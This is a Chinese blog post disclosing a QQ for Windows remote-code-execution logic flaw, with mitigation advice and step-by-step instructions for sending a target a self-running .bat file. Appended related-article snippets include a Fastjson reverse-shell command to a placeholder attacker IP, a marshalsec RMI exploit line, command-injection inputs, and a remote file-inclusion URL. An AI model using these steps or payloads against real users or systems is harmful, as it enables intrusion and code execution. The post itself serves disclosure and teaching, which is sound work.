最新企鹅0day-RCE

最新推荐文章于 2025-11-24 14:30:12 发布
原创 最新推荐文章于 2025-11-24 14:30:12 发布 · 104 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全

本文介绍了QQ Windows版9.7.13及以前版本存在的远程代码执行漏洞,此为逻辑漏洞,利用客户端逻辑缺陷,点击消息链接可自动下载执行。文中说明了漏洞原理、演示步骤,还给出处置建议,如谨慎点击链接、安装终端安全软件。

1.洞详情

漏洞名称: 企鹅客户端远程代码执行漏洞威胁程度:该漏洞为逻辑漏洞,利用企鹅客户端的逻辑缺陷进行攻击,被攻击方在点击消息内容(链接) 时,不会弹窗提示,自动下载执行,在攻击者利用的层面,可降低攻击者钓鱼等攻击手段的难度。

2.处置建议:

1、提示用户谨慎点击消息链接

2、升级或安装终端安全软件,用于检测落盘的文件是否异常

漏洞类型:0day

厂商:腾讯

产品官网链接: https://im.qq.com/pcqq

影响范围:QQ Windows 版 9.7.13 及以前版本漏洞所在

功能模块:文档传输下载模块漏洞攻击效果:远程代码执行

3.漏洞原理

该漏洞为逻辑漏洞,企鹅windows客户端的“文件传输消息”在经过“回复消息”功能处理后,该文件会变为无需任何弹窗确认,点击消息文本后即可自动下载并打开文件的处理方式。

4.漏洞演示

4.1新建一个文本文档,需要打开计算器的话,在文本文档里输入calc,记事本则输入notepad,画板输入mspaint,然后将文本文档另存为xxx.bat(xxx为名称,自己起一个,比如计算器的话,可以起名为计算器.bat)例如1.bat,将1.bat发送给自己,产生一个文件传输消息在聊天窗口中。

4.3在天窗口中回复该消息,发送给自己 

4.4转发最后一次发送的消息给目标

【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
m0_75036923的博客
09-07 1001
【代码】【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现。
Fastjson 漏洞复现1.2.24-rce
人们并不感谢罗辑
08-22 2107
fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞
搜狗输入法漏洞获取系统权限0day再述
caiguazheng4921的博客
04-19 722
测试环境:OS: windows 7 ultimate搜狗输入法 4.3 正式版 漏洞过程描述:当windows加载了搜狗输入法后(登录系统后),锁定计算机(cltr alt del)。切换为搜狗输入法,输入拼音字母出现搜狗输入法工具条后,点击搜索,会调用 iexplorer.exe 。接下来就可以直接在IE地址栏调用system32目录并运行cmd,如果登录账号为admi...
1.2.24-rce Fastjson漏洞复现
weixin_63657481的博客
04-08 1567
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://攻击机ip:8989/#reserve" 8654。String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/攻击机ip/4563 0>&1"};"dataSourceName":"rmi://攻击机ip:8654/reserve",然后在这个java文件的文件夹下开启一个web页面。
命令执行漏洞-rce
persist213的博客
08-24 1369
也不知道怎么来促进传统餐饮行业的升级,能不能做到把原材料供应各环节和厨房进行在线视频直播了,如果能做到这一点,我觉得是餐饮行业的升级,至少食品卫生问题让全民监督,说其它的都是瞎扯,无非就是通过互联网和安全圈多打打广告,搞不好真变成安全圈的端爷大排挡了,说实话如果目标客户都是安全圈的人,也足以实现盈利,至少比在安全行业赚钱,正好可以薅安全圈人的羊毛,主打一个情怀和逼格。安全行业的困境只是暂时的,开餐饮店就是顺势而为,前途是光明的,道路是曲折的,安全行业的未来在变革,不同企业活出自我。《Java代码审计》
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
小城的博客
12-24 1210
目录thinkphp 2-rce5.0.23远程代码执行 大家好,我是小城,一个刚刚起步的学渣,笨鸟先飞,可惜我领悟得太晚。但从现在开始,我会努力加油进取变强! thinkphp 2-rce 0x01 漏洞原理 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 9574
一、漏洞介绍1.1漏洞成因 docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
漏洞复现 Fastjson 1.2.47-rce
Lucky1youzi的博客
01-05 1179
用burp得扩展插件FastjsonScan来进行检测,将拦截得包右击鼠标发送Extensions/FastjsonScan ,如果扫描的目标存在漏洞,在窗口下面的Request窗口会展示使用的payload,如果没有漏洞,则会展示原始的请求与响应。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。构造反弹shell,进行base64编码,推荐在线工具,可以快速做bash反弹shell命令。
CVE-2022-22963-Spring-Core-RCE图形化利用工具
热门推荐
LiBai'S BLOG
04-01 1万+
CVE-2022-22963 描述:Spring4Shell - Spring Core RCE - CVE-2022-22965 链接:https://github.com/TheGejr/SpringShell 描述:Spring4Shell Proof Of Concept/Information CVE-2022-22965 链接:https://github.com/BobTheShoplifter/Spring4Shell-POC 描述:This includes CVE-2022-22
漏洞复现Thinkphp的5.0.23-rce
2401_86120759的博客
10-21 794
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。查看后台输入语句:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd。网站后拼接index.php/?s=captcha进行访问。建议进行ThinkPHP版本更新。
最新版JEDEC2025】 JESD309-S4-RCE_v1.1 DDR5 Small Outline Dual Inline
11-04
JEDEC2025是该组织在2025年发布的最新技术规范。在内存技术方面,JEDEC2025所代表的是一系列新的技术要求和改进,旨在提升内存模块的性能、效率以及兼容性。 在这些技术规范中,JESD309-S4-RCE_v1.1特别针对了DDR5...
Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或...
亿赛通电子文档安全管理系统-rce-exp_CNVD-2021-26058.zip
09-01
亿赛通电子文档安全管理系统-rce-exp_CNVD-2021-26058
湖科大计网好题合集
2402_88307286的博客
11-21 170
瞎√⑧写的
PythonWebSocket开发
2509_93947499的博客
11-22 235
而WebSocket就像一直保持通话状态,客服有新消息直接告诉你,这才是真正的实时通信。建议从简单例子开始,逐步增加功能,遇到问题多查文档和源码,其实没那么难搞定。当客户端连接时,handle_connection协程开始处理消息,用async for循环持续监听 incoming消息,收到后立即回复。调试技巧方面,浏览器开发者工具的Network标签页可以查看WebSocket帧,Chrome的WebSocket Inspector扩展也很好用。网络不稳定时连接可能断开,需要实现自动重连机制。
从零开始:使用 pyproject.toml 构建现代化 Python 项目
像风一样自由的博客
11-23 778
本文介绍了如何使用 pyproject.toml 构建现代化 Python 项目,以 PyImage Split 图片工具为例。相比传统分散配置方式,pyproject.toml 提供了统一、声明式的项目配置,解决了格式混乱、工具兼容性差等问题。文章详细讲解了配置文件的基本结构,包括构建系统、项目元数据、依赖管理等核心部分,并提供了完整的配置示例。通过采用这种标准化配置方式,开发者可以更高效地管理 Python 项目,提升代码质量和维护性。
ESP32基础-Socket通信 (TCP/UDP)
hazy1k的博客
11-24 805
本文介绍了在ESP32上实现Socket通信的三种主要模式:TCP服务端、TCP客户端和UDP通信。TCP服务端模式适用于设备被动接收控制指令的场景,TCP客户端模式适合主动发送数据,而UDP则用于无需连接的快速数据传输。文章提供了每种模式的完整代码示例,并强调了关键注意事项,如阻塞与非阻塞处理、端口绑定重用等常见问题。还推荐了网络调试工具NetAssist用于测试,并解释了不同通信模式的适用场景,为物联网设备开发提供了实用的网络通信解决方案。
【Linux 网络基础】网络通信中的组播与广播:基础概念、原理、抓包与应用
最新发布
love131452098的博客
11-24 588
摘要: 组播(Multicast)和广播(Broadcast)是网络通信中两种重要的数据传输机制。组播面向特定订阅组(IPv4 224.0.0.0/4,IPv6 ff00::/8),通过IGMP/PIM协议实现成员管理和路由分发,适用于视频会议、股票行情推送等场景;广播则在同一二层域内泛洪(MAC ff:ff:ff:ff:ff:ff),用于ARP、DHCP等协议。关键配置包括交换机IGMP Snooping、路由器PIM-SSM/Storm Control,并需注意TTL、防火墙策略。常见问题包括组播丢包(
TCP网络编程(简易回声客户端):客户端创建、连接、请求及测试全流程解析
祯的博客
11-23 657
本文围绕TCP网络编程中客户端相关操作展开。先阐述客户端套接字创建,对比其与服务端创建的异同,并给出TCP客户端类实现代码。接着介绍客户端连接服务器流程,说明无需显式绑定的原因及connect函数用法,展示类中连接服务器的实现。然后讲述客户端发起请求,以简单回声服务器为例说明数据收发。最后说明服务器测试步骤,包括启动服务端检查状态、客户端连接及通信验证,还提及客户端断开连接时服务端的处理。
polarctf-web-rce
11-01
仅给定的引用内容未涉及polarctf-web-rce相关信息。一般而言,Web RCE(Remote Code Execution,远程代码执行)漏洞是一种严重的安全漏洞,攻击者可利用该漏洞在目标Web服务器上远程执行任意代码。 在CTF竞赛中,针对Web RCE漏洞的利用方法通常有以下几种: - **命令注入**:若Web应用程序在处理用户输入时未进行严格过滤和验证,攻击者可通过构造恶意输入,将系统命令注入到应用程序调用的命令中执行。例如,在一个接受用户输入作为系统命令参数的PHP页面中,攻击者可构造类似 `;ls -l` 的输入来执行 `ls -l` 命令。示例代码如下: ```php <?php $input = $_GET['input']; system("ping -c 4 " . $input); ?> ``` 攻击者可通过构造URL `http://example.com/test.php?input=127.0.0.1;ls -l` 来执行 `ls -l` 命令。 - **代码注入**:当Web应用程序动态执行用户提供的代码时,攻击者可注入恶意代码。比如在一个支持用户输入Python代码并执行的页面中,攻击者可输入恶意的Python代码来获取系统信息或执行其他操作。示例代码如下: ```python code = input("请输入Python代码:") exec(code) ``` 攻击者可输入 `import os;os.system('ls -l')` 来执行 `ls -l` 命令。 - **文件包含漏洞利用**:若Web应用程序存在文件包含漏洞,攻击者可通过包含恶意文件来执行代码。例如,在一个PHP应用中,若存在如下代码: ```php <?php $file = $_GET['file']; include($file); ?> ``` 攻击者可构造URL `http://example.com/test.php?file=http://attacker.com/shell.php` 来包含并执行攻击者服务器上的恶意PHP文件。 在polarctf中,要发现和利用Web RCE漏洞,通常需要对Web应用进行全面的安全测试,包括对输入点的测试、对应用程序代码的审计等。同时,还需要了解目标应用所使用的技术栈和环境,以便更精准地发现和利用漏洞。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值